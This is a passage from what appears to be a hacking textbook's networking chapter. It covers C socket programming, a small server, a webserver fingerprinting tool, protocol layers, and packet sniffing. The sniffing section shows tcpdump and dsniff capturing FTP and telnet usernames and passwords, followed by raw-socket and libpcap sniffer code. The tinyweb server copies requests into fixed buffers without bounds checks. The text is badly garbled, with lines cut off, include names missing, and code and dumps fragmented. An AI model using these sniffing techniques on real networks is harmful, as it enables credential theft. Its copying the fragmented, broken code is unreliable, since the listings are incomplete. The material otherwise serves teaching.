Protocol, implying that it can be used to create custom protocols
...
It’s
not a real connection, just a basic method for sending data from one point
to another
...
If your program needs to confirm that a
packet was received by the other side, the other side must be coded to send
back an acknowledgment packet
...

198

0x 400

Datagram sockets and UDP are commonly used in networked games and
streaming media, since developers can tailor their communications exactly
as needed without the built-in overhead of TCP
...
Sockets behave so much like files that you can actually use the
read() and write() functions to receive and send data using socket file descriptors
...
These functions have their prototypes defined in /usr/include/
sys/sockets
...

socket(int domain, int type, int protocol)

Used to create a new socket, returns a file descriptor for the socket or
-1 on error
...

Returns 0 on success and -1 on error
...

Returns 0 on success and -1 on error
...
Returns 0 on success and -1 on error
...
The address information from the remote host is written into the remote_host structure and
the actual size of the address structure is written into *addr_length
...

send(int fd, void *buffer, size_t n, int flags)
Sends n bytes from *buffer to socket fd; returns the number of bytes sent
or -1 on error
...

When a socket is created with the socket() function, the domain, type,
and protocol of the socket must be specified
...
A socket can be used to communicate using a
variety of protocols, from the standard Internet protocol used when you
browse the Web to amateur radio protocols such as AX
...
These protocol families are defined in bits/socket
...
h
...
h
/* Protocol families
...
*/
#define PF_LOCAL 1 /* Local to host (pipes and file-domain)
...
*/
#define PF_FILE
PF_LOCAL /* Another nonstandard name for PF_LOCAL
...
*/
#define PF_AX25
3 /* Amateur Radio AX
...
*/
#define PF_IPX
4 /* Novell Internet Protocol
...
*/
#define PF_NETROM 6 /* Amateur radio NetROM
...
*/
#define PF_ATMPVC 8 /* ATM PVCs
...
25 project
...
*/

...
The types of sockets
are also defined in bits/socket
...
(The /* comments */ in the code above are
just another style that comments out everything between the asterisks
...
h
/* Types of sockets
...
*/
#define SOCK_STREAM SOCK_STREAM
SOCK_DGRAM = 2,
/* Connectionless, unreliable datagrams of fixed maximum length
...

The final argument for the socket() function is the protocol, which should
almost always be 0
...
In practice, however, most protocol families only have one protocol, which means this should usually be set for 0; the first and only protocol
in the enumeration of the family
...

0x422 Socket Addresses
Many of the socket functions reference a sockaddr structure to pass address
information that defines a host
...
h,
as shown on the following page
...
h
/* Get the definition of the macro to define the common sockaddr members
...
h>
/* Structure describing a generic socket address
...

char sa_data[14];
/* Address data
...
h
file, which basically translates to an unsigned short int
...
Since sockets can communicate using a variety of protocol
families, each with their own way of defining endpoint addresses, the definition of an address must also be variable, depending on the address family
...
h; they usually
translate directly to the corresponding protocol families
...
h
/* Address families
...

Since an address can contain different types of information, depending
on the address family, there are several other address structures that contain,
in the address data section, common elements from the sockaddr structure as
well as information specific to the address family
...
This means
that a socket() function will simply accept a pointer to a sockaddr structure,
which can in fact point to an address structure for IPv4, IPv6, or X
...
This
allows the socket functions to operate on a variety of protocols
...
The parallel
socket address structure for AF_INET is defined in the netinet/in
...

N et wor kin g

201

From /usr/include/netinet/in
...
*/
struct sockaddr_in
{
__SOCKADDR_COMMON (sin_);
in_port_t sin_port;
/* Port number
...
*/
/* Pad to size of 'struct sockaddr'
...
Since
a socket endpoint address consists of an Internet address and a port number,
these are the next two values in the structure
...
The rest of the structure is just 8 bytes of padding to fill out
the rest of the sockaddr structure
...
In the end, the
socket address structures end up looking like this:
sockaddr structure (Generic structure)

Family

sa_data (14 bytes)

sockaddr_in structure (Used for IP version 4)

Family

Port #

IP address

Extra padding (8 bytes)

Both structures are the same size
...
This is
the opposite of x86’s little-endian byte ordering, so these values must be converted
...
h and arpa/inet
...
Here
is a summary of these common byte order conversion functions:
Host-to-Network Long
Converts a 32-bit integer from the host’s byte order to network byte order

htonl(long value)

202

0x 400

Host-to-Network Short
Converts a 16-bit integer from the host’s byte order to network byte order

htons(short value)

Network-to-Host Long
Converts a 32-bit integer from network byte order to the host’s byte order

ntohl(long value)

Network-to-Host Short
Converts a 16-bit integer from network byte order to the host’s byte order

ntohs(long value)

For compatibility with all architectures, these conversion functions should
still be used even if the host is using a processor with big-endian byte ordering
...
110
...
204, you probably recognize this as an Internet
address (IP version 4)
...
These functions
are defined in the arpa/inet
...

inet_ntoa(struct in_addr *network_addr)

Network to ASCII
This function converts the other way
...
This string is held in a statically allocated memory buffer in the
function, so it can be accessed until the next call to inet_ntoa(), when the
string will be overwritten
...
The following
server code listens for TCP connections on port 7890
...
This is done using socket functions and structures from the include
files mentioned earlier, so these files are included at the beginning of the
program
...
h,
which is shown on the following page
...
h
// Dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
unsigned char byte;
unsigned int i, j;
for(i=0; i < length; i++) {
byte = data_buffer[i];
printf("%02x ", data_buffer[i]); // Display byte in hex
...

byte = data_buffer[j];
if((byte > 31) && (byte < 127)) // Outside printable char range
printf("%c", byte);
else
printf("
...

However, since it is also useful in other places, it has been put into hacking
...
The rest of the server program will be explained as you read the
source code
...
c
#include
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>
"hacking
...
We want
a TCP/IP socket, so the protocol family is PF_INET for IPv4 and the socket type
is SOCK_STREAM for a stream socket
...
This function returns a
socket file descriptor which is stored in sockfd
...
This function call sets the SO_REUSEADDR socket option to true, which will allow it to reuse
a given address for binding
...
If a socket isn’t
closed properly, it may appear to be in use, so this option lets a socket bind to
a port (and take over control of it), even if it seems to be in use
...
Since SO_REUSEADDR is a socket-level option, the level is set to
SOL_SOCKET
...
h
...
A pointer to data and the
length of that data are two arguments that are often used with socket functions
...
The SO_REUSEADDR options uses a 32-bit integer for its
value, so to set this option to true, the final two arguments must be a pointer
to the integer value of 1 and the size of an integer (which is 4 bytes)
...
sin_family = AF_INET;
// Host byte order
host_addr
...
sin_addr
...

memset(&(host_addr
...

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
fatal("binding to socket");
if (listen(sockfd, 5) == -1)
fatal("listening on socket");

These next few lines set up the host_addr structure for use in the bind call
...
The port is set to PORT, which is defined as 7890
...
The address is set to 0, which means it will automatically be filled with
the host’s current IP address
...

The bind() call passes the socket file descriptor, the address structure,
and the length of the address structure
...

N et wor kin g

205

The listen() call tells the socket to listen for incoming connections, and
a subsequent accept() call actually accepts an incoming connection
...
The last argument to the listen() call
sets the maximum size for the backlog queue
...

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
printf("server: got connection from %s port %d\n",
inet_ntoa(client_addr
...
sin_port));
send(new_sockfd, "Hello, world!\n", 13, 0);
recv_length = recv(new_sockfd, &buffer, 1024, 0);
while(recv_length > 0) {
printf("RECV: %d bytes\n", recv_length);
dump(buffer, recv_length);
recv_length = recv(new_sockfd, &buffer, 1024, 0);
}
close(new_sockfd);
}
return 0;
}

Next is a loop that accepts incoming connections
...
This is because the accept() function will write the connecting client’s address information into the address
structure and the size of that structure into sin_size
...
The accept() function returns a new socket file descriptor for the accepted
connection
...

After getting a connection, the program prints out a connection message,
using inet_ntoa() to convert the sin_addr address structure to a dotted-number
IP string and ntohs() to convert the byte order of the sin_port number
...
The final argument for the
send() and recv() functions are flags, that for our purposes, will always be 0
...

The recv() function is given a pointer to a buffer and a maximum length to
read from the socket
...
The loop will continue as
long as the recv() call continues to receive data
...
c
reader@hacking:~/booksrc $
...
out

A telnet client basically works like a generic TCP connection client, so it
can be used to connect to the simple server by specifying the target IP address
and port
...
168
...
248 7890
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
Since telnet is line-buffered, each of these two lines is sent back to the
server when ENTER is pressed
...

On a Local Machine
reader@hacking:~/booksrc $
...
out
server: got connection from 192
...
42
...

RECV: 45 bytes
66 6a 73 67 68 61 75 3b 65 68 67 3b 69 68 73 6b | fjsghau;ehg;ihsk
6a 66 68 61 73 64 6b 66 6a 68 61 73 6b 6a 76 68 | jfhasdkfjhaskjvh
66 64 6b 6a 68 76 62 6b 6a 67 66 0d 0a
| fdkjhvbkjgf
...
However, there are thousands of
different types of servers that accept standard TCP/IP connections
...

This connection transmits the web page over the connection using HTTP,
which defines a certain way to request and send information
...

N et wor kin g

207

From /etc/services
finger
finger
http

79/tcp
79/udp
80/tcp

# Finger
www www-http

# World Wide Web HTTP

HTTP exists in the application layer—the top layer—of the OSI model
...
Many other
application layer protocols also use plaintext, such as POP3, SMTP, IMAP,
and FTP’s control channel
...
Once you know the syntax of these
various protocols, you can manually talk to other programs that speak the
same language
...
In the language of
HTTP, requests are made using the command GET, followed by the resource
path and the HTTP protocol version
...
0 will request
the root document from the webserver using HTTP version 1
...
The request
is actually for the root directory of /, but most webservers will automatically
search for a default HTML document in that directory of index
...
If the
server finds the resource, it will respond using HTTP by sending several
headers before sending the content
...
These headers
are plaintext and can usually provide information about the server
...
0 and pressing ENTER twice
...
internic
...
Then the HTTP application layer is manually
spoken to request the headers for the main index page
...
internic
...
77
...
101
...
internic
...

Escape character is '^]'
...
0
HTTP/1
...
0
...

reader@hacking:~/booksrc $

208

0x 400

This reveals that the webserver is Apache version 2
...
52 and even that
the host runs CentOS
...

The next few programs will be sending and receiving a lot of data
...
These functions, called send_string() and recv_line(),
will be added to a new include file called hacking-network
...

The normal send() function returns the number of bytes written, which
isn’t always equal to the number of bytes you tried to send
...
It uses strlen() to figure out the
total length of the string passed to it
...
This is how telnet terminates the lines—it sends
a carriage return and a newline character
...
A quick look at an ASCII table
shows that 0x0D is a carriage return ('\r') and 0x0A is the newline character
('\n')
...

Oct
Dec Hex
Char
Oct
012
10
0A
LF '\n' (new line)
112
015
13
0D
CR '\r' (carriage ret)
115
reader@hacking:~/booksrc $

Dec
74
77

Hex
4A
4D

Char
J
M

The recv_line() function reads entire lines of data
...
It continues receiving from the socket until it encounters the last two linetermination bytes in sequence
...
These new functions ensure that all bytes are sent and receive data
as lines terminated by '\r\n'
...
h
...
h
/* This function accepts a socket FD and a ptr to the null terminated
* string to send
...
Returns 1 on success and 0 on failure
...

N et wor kin g

209

bytes_to_send -= sent_bytes;
buffer += sent_bytes;
}
return 1; // Return 1 on success
...
It will receive from the socket until the EOL byte
* sequence in seen
...

* Returns the size of the read line (without EOL bytes)
...

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
eol_matched++;
if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
*(ptr+1-EOL_SIZE) = '\0'; // terminate the string
...

}
return 0; // Didn't find the end-of-line characters
...
In the manual HTTP
HEAD request, the telnet program automatically does a DNS (Domain Name
Service) lookup to determine that www
...
net translates to the IP address
192
...
34
...
DNS is a protocol that allows an IP address to be looked up by a
named address, similar to how a phone number can be looked up in a phone
book if you know the name
...
These functions and structures are defined in netdb
...
A function called gethostbyname() takes a pointer
to a string containing a named address and returns a pointer to a hostent
structure, or NULL pointer on error
...
Similar to the inet_ntoa() function, the memory for
this structure is statically allocated in the function
...
h
...
h
/* Description of database entry for a single host
...
*/
char **h_aliases;
/* Alias list
...
*/
int h_length;
/* Length of address
...
*/
#define h_addr h_addr_list[0] /* Address, for backward compatibility
...

host_lookup
...
h>
...
h>
...
h>
...
h>
#include "hacking
...
The gethostbyname() function returns a pointer to a hostent structure, which contains the IP address in element h_addr
...
Sample program
output is shown on the following page
...
c
reader@hacking:~/booksrc $
...
internic
...
internic
...
77
...
101
reader@hacking:~/booksrc $
...
google
...
google
...
125
...
103
reader@hacking:~/booksrc $

Using socket functions to build on this, creating a webserver identification
program isn’t that difficult
...
c
#include
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>
...
h"
#include "hacking-network
...
sin_family = AF_INET;
target_addr
...
sin_addr = *((struct in_addr *)host_info->h_addr);
memset(&(target_addr
...

if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
fatal("connecting to target server");
send_string(sockfd, "HEAD / HTTP/1
...
The target_addr structure’s sin_addr element is filled using the address from the host_info structure
by typecasting and then dereferencing as before (but this time it’s done in a
single line)
...
The strncasecmp() function is a string comparison function from
strings
...
This function compares the first n bytes of two strings, ignoring
capitalization
...
The function will return 0 if
the strings match, so the if statement is searching for the line that starts with
"Server:"
...
The following listing shows compilation and
execution of the program
...
c
reader@hacking:~/booksrc $
...
internic
...
internic
...
0
...
/webserver_id www
...
com
The web server for www
...
com is Microsoft-IIS/7
...
After accepting a TCP-IP connection, the
webserver needs to implement further layers of communication using the
HTTP protocol
...
This function handles HTTP GET and HEAD requests that would come from a web browser
...
If the file can’t be found, the server will
respond with a 404 HTTP response
...
The complete source code listing
follows
...
c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>
...
h>
"hacking
...
h"

#define PORT 80
// The port users will be connecting to
#define WEBROOT "
...
sin_family = AF_INET;
//
host_addr
...
sin_addr
...
sin_zero), '\0', 8);

Host byte order
Short, network byte order
// Automatically fill with my IP
...

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
fatal("binding to socket");
if (listen(sockfd, 20) == -1)
fatal("listening on socket");
while(1) {
// Accept loop
...
The connection is processed as a web request,
* and this function replies over the connected socket
...

*/
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
unsigned char *ptr, request[500], resource[500];
int fd, length;
length = recv_line(sockfd, request);
printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
ptr = strstr(request, " HTTP/"); // Search for valid-looking request
...

printf(" NOT HTTP!\n");
} else {
*ptr = 0; // Terminate the buffer at the end of the URL
...

if(strncmp(request, "GET ", 4) == 0) // GET request
ptr = request+4; // ptr is the URL
...

if(ptr == NULL) { // Then this is not a recognized request
...
html");
// add 'index
...

strcpy(resource, WEBROOT);
// Begin resource with web root path
strcat(resource, ptr);
// and join it with resource path
...

printf("\tOpening \'%s\'\t", resource);
if(fd == -1) { // If file is not found
printf(" 404 Not Found\n");
send_string(sockfd, "HTTP/1
...

printf(" 200 OK\n");
send_string(sockfd, "HTTP/1
...

send(sockfd, ptr, length, 0); // Send it to socket
...

}
close(fd); // Close the file
...

} // End if block for valid request
...

shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully
...
Returns -1 on failure
...
st_size;
}

The handle_connection function uses the strstr() function to look for the
substring HTTP/ in the request buffer
...
The string is
terminated here, and the requests HEAD and GET are recognized as processable
requests
...

The files index
...
jpg have been put into the directory
webroot, as shown in the output below, and then the tinyweb program is
compiled
...
The server’s debugging output shows
the results of a web browser’s request of http://127
...
0
...
jpg
-rw-r--r-- 1 reader reader
261 2007-05-28 23:42 index
...
html

A sample webpage

This is a sample webpage

...
and even a sample image:

...
/webroot/index
...
0
...
1:52997 "GET /image
...
1"
Opening '
...
jpg'
200 OK
Got request from 127
...
0
...
ico HTTP/1
...
/webroot/favicon
...
0
...
1 is a special loopback address that routes to the
local machine
...
html from the webserver, which
in turn requests image
...
In addition, the browser automatically requests
favicon
...
The screenshot below shows the results of this request in a browser
...
At the upper layers of
OSI, many protocols can be plaintext since all the other details of the connection are already taken care of by the lower layers
...

TCP on the transport layer (4) provides reliability and transport control,
while IP on the network layer (3) provides addressing and packet-level
communication
...
At the bottom, the physical layer (1) is simply the wire and
the protocol used to send bits from one device to another
...

This process can be thought of as an intricate interoffice bureaucracy,
reminiscent of the movie Brazil
...

As data packets are transmitted, each receptionist performs the necessary
duties of her particular layer, puts the packet in an interoffice envelope,
writes the header on the outside, and passes it on to the receptionist at the
next layer below
...
Network traffic is a chattering bureaucracy
of servers, clients, and peer-to-peer connections
...
Regardless of
what the packets contain, the protocols used at the lower layers to move the
data from point A to point B are usually the same
...

0x431 Data-Link Layer
The lowest visible layer is the data-link layer
...
This layer provides a way
to address and send messages to anyone else in the office, as well as to figure
out who’s in the office
...
These addresses are known as Media Access Control (MAC) addresses
...
These addresses are also sometimes referred to as hardware
addresses, since each address is unique to a piece of hardware and is stored in
the device’s integrated circuit memory
...

An Ethernet header is 14 bytes in size and contains the source and destination MAC addresses for this Ethernet packet
...

Any Ethernet packet sent to this address will be sent to all the connected
devices
...
The concept of IP addresses doesn’t exist
at this level, only hardware addresses do, so a method is needed to correlate

218

0x 400

the two addressing schemes
...
In Ethernet,
the method is known as Address Resolution Protocol (ARP)
...
There are four different types of ARP messages, but
the two most important types are ARP request messages and ARP reply messages
...

This type is used to specify whether the packet is an ARP-type message or an
IP packet
...
” An ARP
reply is the corresponding response that is sent to the requester’s MAC address
(and IP address) saying, “This is my MAC address, and I have this IP address
...
These caches are like the interoffice seating chart
...
10
...
20 and MAC
address 00:00:00:aa:aa:aa, and another system on the same network has
the IP address 10
...
10
...

ARP request
Source MAC: 00:00:00:aa:aa:aa
Dest MAC: ff:ff:ff:ff:ff:ff
“Who has 10
...
10
...
10
...
20
MAC: 00:00:00:aa:aa:aa

Second system
IP: 10
...
10
...
10
...
50 is at 00:00:00:bb:bb:bb
...
10
...
50, the first system will first check its
ARP cache to see if an entry exists for 10
...
10
...
Since this is the first time
these two systems are trying to communicate, there will be no such entry, and
an ARP request will be sent out to the broadcast address, saying, “If you are
10
...
10
...
” Since this request
uses the broadcast address, every system on the network sees the request, but
only the system with the corresponding IP address is meant to respond
...
10
...
50 and I’m at 00:00:00:bb:bb:bb
...

N et wor kin g

219

0x432 Network Layer
The network layer is like a worldwide postal service providing an addressing
and delivery method used to send things everywhere
...

Every system on the Internet has an IP address, consisting of a familiar
four-byte arrangement in the form of xx
...
xx
...
The IP header for packets
in this layer is 20 bytes in size and consists of various fields and bitflags as
defined in RFC 791
...

3
...

SPECIFICATION

Internet Header Format

A summary of the contents of the internet header follows:
0
1
2
3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service|
Total Length
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Identification
|Flags|
Fragment Offset
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live |
Protocol
|
Header Checksum
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Source Address
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Destination Address
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Options
|
Padding
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header
Figure 4
...

This surprisingly descriptive ASCII diagram shows these fields and their
positions in the header
...

Similar to the Ethernet header, the IP header also has a protocol field to
describe the type of data in the packet and the source and destination
addresses for routing
...

The Internet Protocol is mostly used to transmit packets wrapped in
higher layers
...
ICMP packets are used for messaging and diagnostics
...
If there’s a problem, an ICMP packet
is sent back to notify the sender of the problem
...
ICMP Echo Request
and Echo Reply messages are used by a utility called ping
...
Upon receipt of the ICMP Echo Request, the
remote host sends back an ICMP Echo Reply
...
However, it is
important to remember that ICMP and IP are both connectionless; all this
protocol layer really cares about is getting the packet to its destination address
...
IP can deal with this situation by fragmenting
packets, as shown here
...
Each fragment has a different fragment offset value, which is stored
in the header
...

Provisions such as fragmentation aid in the delivery of IP packets, but
this does nothing to maintain connections or ensure delivery
...

0x433 Transport Layer
The transport layer can be thought of as the first line of office receptionists,
picking up the mail from the network layer
...
Then the receptionist would follow
the return protocol by asking for a receipt and eventually issuing an RMA
number so the customer can mail the product in
...

N et wor kin g

221

The two major protocols at this layer are the Transmission Control
Protocol (TCP) and User Datagram Protocol (UDP)
...
One of
the reasons for TCP’s popularity is that it provides a transparent, yet reliable
and bidirectional, connection between two IP addresses
...
A bidirectional connection with TCP is similar to using
a telephone—after dialing a number, a connection is made through which
both parties can communicate
...
If the packets
of a connection get jumbled up and arrive out of order, TCP will make sure
they’re put back in order before handing the data up to the next layer
...

All of this functionality is made possible by a set of flags, called TCP flags,
and by tracking values called sequence numbers
...
The TCP header is specified in RFC 793
...

3
...

FUNCTIONAL SPECIFICATION

Header Format

TCP segments are sent as internet datagrams
...
A TCP header follows the internet
header, supplying information specific to the TCP protocol
...

TCP Header Format

222

0x 400

0
1
2
3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Source Port
|
Destination Port
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Sequence Number
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Acknowledgment Number
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data |
|U|A|P|R|S|F|
|
| Offset| Reserved |R|C|S|S|Y|I|
Window
|
|
|
|G|K|H|T|N|N|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Checksum
|
Urgent Pointer
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Options
|
Padding
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
data
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header Format
Note that one tick mark represents one bit position
...

The sequence number and acknowledgment number are used to maintain
state
...
When a client wants to open a connection
with a server, a packet with the SYN flag on, but the ACK flag off, is sent to
the server
...
To complete the connection, the client sends back a
packet with the SYN flag off but the ACK flag on
...

Only the first two packets of the connection have the SYN flag on, since those
packets are used to synchronize sequence numbers
...

When a connection is initiated, each side generates an initial sequence
number
...
Then, with each packet that is sent,
the sequence number is incremented by the number of bytes found in the
data portion of the packet
...
In addition, each TCP header has an acknowledgment number,
which is simply the other side’s sequence number plus one
...
However, the cost of this functionality is paid in communication overhead
...
This
lack of functionality makes it behave much like the IP protocol: It is connectionless and unreliable
...
Sometimes connections aren’t needed, and the lightweight UDP is a much better protocol for these situations
...
It only contains four 16-bit values in this
order: source port, destination port, length, and checksum
...
On an unswitched network, Ethernet packets pass through every
device on the network, expecting each system device to only look at the
packets sent to its destination address
...
Most packet-capturing programs, such as tcpdump,
drop the device they are listening to into promiscuous mode by default
...

reader@hacking:~/booksrc $ ifconfig eth0
eth0
Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:17115 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4602913 (4
...
2 KiB)
Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc
reader@hacking:~/booksrc $ ifconfig eth0
eth0
Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:17181 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4668475 (4
...
2 KiB)

224

0x 400

Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $

The act of capturing packets that aren’t necessarily meant for public viewing is called sniffing
...

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192
...
0
...
684964 192
...
0
...
ftp > 192
...
0
...
32778: P 1:42(41) ack 1 win
17316 (DF)
0x0000 4500 005d e065 4000 8006 97ad c0a8 0076
E
...
v
0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8

...

0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78

...
x
0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420

...
TYPSoft
...
Server
...
99
...
685132 192
...
0
...
32778 > 192
...
0
...
ftp:
...
4
...

0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c

...

0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56

...
x
21:27:52
...
168
...
193
...
168
...
118
...
p@
...
v
...
Z
0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a

...
leech
...
415487 192
...
0
...
ftp > 192
...
0
...
32778: P 42:76(34) ack 13
win 17304 (DF)
0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076
E
...
m
...

0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5

...
N,
...
Z331
...
required
...
le
0x0050 6563
ec
21:27:52
...
168
...
193
...
168
...
118
...
ack 76 win 5840
(DF) [tos 0x10]
0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1
E
...
q@
...
v
...
[
0x0030 0007 1fc5

...
155458 192
...
0
...
32778 > 192
...
0
...
ftp: P 13:27(14) ack 76
win 5840 (DF) [tos 0x10]
0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1
E
...
r@
...
v
...

0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465

...
l8@nite
0x0040 0d0a

...
179427 192
...
0
...
ftp > 192
...
0
...
32778: P 76:103(27) ack 27
win 17290 (DF)
0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076
E
...
T
...

N et wor kin g

225

0x0020
0x0030
0x0040

8018 438a 4c8c 0000 0101 080a 0007 1feb
000e 10d1 3233 3020 5573 6572 206c 6565
6368 206c 6f67 6765 6420 696e 2e0d 0a

...
L
...
230
...
lee
ch
...
in
...
In the preceding example, the user leech is seen logging
into an FTP server using the password l8@nite
...

tcpdump is a wonderful, general-purpose packet sniffer, but there are
specialized sniffing tools designed specifically to search for usernames and
passwords
...

reader@hacking:~/booksrc $ sudo dsniff -n
dsniff: listening on eth0
----------------12/10/02 21:43:21 tcp 192
...
0
...
32782 -> 192
...
0
...
21 (ftp)
USER leech
PASS l8@nite
----------------12/10/02 21:47:49 tcp 192
...
0
...
32785 -> 192
...
0
...
23 (telnet)
USER root
PASS 5eCr3t

0x441 Raw Socket Sniffer
So far in our code examples, we have been using stream sockets
...
Accessing the OSI model of the session (5) layer, the
operating system takes care of all of the lower-level details of transmission,
correction, and routing
...
At this lower layer, all the details are exposed and must be
handled explicitly by the programmer
...
In this case, the protocol matters since there are multiple
options
...
The
following example is a TCP sniffing program using raw sockets
...
c
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>

#include "hacking
...
Notice that buffer is
declared as a u_char variable
...
h that expands to “unsigned char
...

When compiled, the program needs to be run as root, because the use
of raw sockets requires root access
...

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff
...
/raw_tcpsniff
[!!] Fatal Error in socket: Operation not permitted
reader@hacking:~/booksrc $ sudo
...
D
...
F#
...
l
...
2G
...
;e
...

Got a 70 byte packet
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E
...
7@
...

c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 |
...

80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 |
...
(AAAAAAAAAAAA
41 41 41 41 0d 0a
| AAAA
...
G
...
F
...
l
...
hE
...
fjsdalkfjask
66 6a 61 73 64 0d 0a
| fjasd
...
Also, it only captures
TCP packets—to capture UDP or ICMP packets, additional raw sockets need
to be opened for each
...
Raw socket code for Linux most
likely won’t work on BSD or Solaris
...

N et wor kin g

227

0x442 libpcap Sniffer
A standardized programming library called libpcap can be used to smooth
out the inconsistencies of raw sockets
...
Both tcpdump and dsniff use
libpcap, which allows them to compile with relative ease on any platform
...
These functions are quite intuitive, so we will discuss
them using the following code listing
...
c
#include ...
h"
void pcap_fatal(const char *failed_in, const char *errbuf) {
printf("Fatal Error in %s: %s\n", failed_in, errbuf);
exit(1);
}

First, pcap
...
Also, I’ve written a pcap_fatal() function for displaying
fatal errors
...

int main() {
struct pcap_pkthdr header;
const u_char *packet;
char errbuf[PCAP_ERRBUF_SIZE];
char *device;
pcap_t *pcap_handle;
int i;

The errbuf variable is the aforementioned error buffer, its size coming
from a define in pcap
...
The header variable is a pcap_pkthdr structure
containing extra capture information about the packet, such as when it was
captured and its length
...

device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);

The pcap_lookupdev() function looks for a suitable device to sniff on
...
For
our system this will always be /dev/eth0, although it will be different on a BSD
system
...

228

0x 400

pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);

Similar to the socket function and file open function, the pcap_open_live()
function opens a packet-capturing device, returning a handle to it
...
Since we
want to capture in promiscuous mode, the promiscuous flag is set to 1
...
len);
dump(packet, header
...

This function is passed the pcap_handle and a pointer to a pcap_pkthdr structure so it can fill it with details of the capture
...
Then pcap_close() closes the capture interface
...
This
can be done using the -l flag with GCC, as shown in the output below
...

reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
o: In function `main':
pcap_sniff
...
text+0x1c8): undefined reference to `pcap_lookupdev'
pcap_sniff
...
text+0x233): undefined reference to `pcap_open_live'
pcap_sniff
...
text+0x282): undefined reference to `pcap_next'
pcap_sniff
...
